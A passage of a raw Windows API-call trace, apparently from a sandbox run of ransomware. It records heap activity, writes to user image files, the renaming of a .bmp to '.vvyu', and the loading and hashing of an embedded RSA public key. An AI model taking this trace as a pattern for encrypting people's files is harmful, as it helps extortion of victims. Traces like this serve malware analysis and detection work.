(HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.890] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0201.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3560 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.894] GetCurrentThreadId () returned 0x66c [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8d78 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.894] GetCurrentThreadId () returned 0x66c [0201.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0201.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0201.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90080 | out: hHeap=0x620000) returned 1 [0201.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.906] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x3fc0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x3fc0, lpOverlapped=0x0) returned 1 [0201.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.907] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x3fc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.907] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.909] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.909] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.909] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.909] CloseHandle (hObject=0x510) returned 1 [0201.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.911] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\tNBhPX6T.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\tnbhpx6t.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\tNBhPX6T.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\tnbhpx6t.bmp.vvyu")) returned 1 [0201.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.913] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.916] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacb941c0, ftCreationTime.dwHighDateTime=0x1d897d5, ftLastAccessTime.dwLowDateTime=0x29b26f10, ftLastAccessTime.dwHighDateTime=0x1d89a3a, ftLastWriteTime.dwLowDateTime=0x29b26f10, ftLastWriteTime.dwHighDateTime=0x1d89a3a, nFileSizeHigh=0x0, nFileSizeLow=0x61a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X5TjkQT17l1kq.bmp", cAlternateFileName="X5TJKQ~1.BMP")) returned 1 [0201.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.916] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\X5TjkQT17l1kq.bmp") returned=".bmp" [0201.916] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\X5TjkQT17l1kq.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\x5tjkqt17l1kq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.917] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=24994) returned 1 [0201.917] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.920] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x617c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.920] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.922] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.922] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x61a2, lpOverlapped=0x0) returned 1 [0201.923] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.923] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.923] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.923] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.924] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.924] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.925] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.925] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.925] GetLastError () returned 0x0 [0201.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.925] GetLastError () returned 0x0 [0201.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.925] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.925] CryptReleaseContext (hProv=0x67c300, 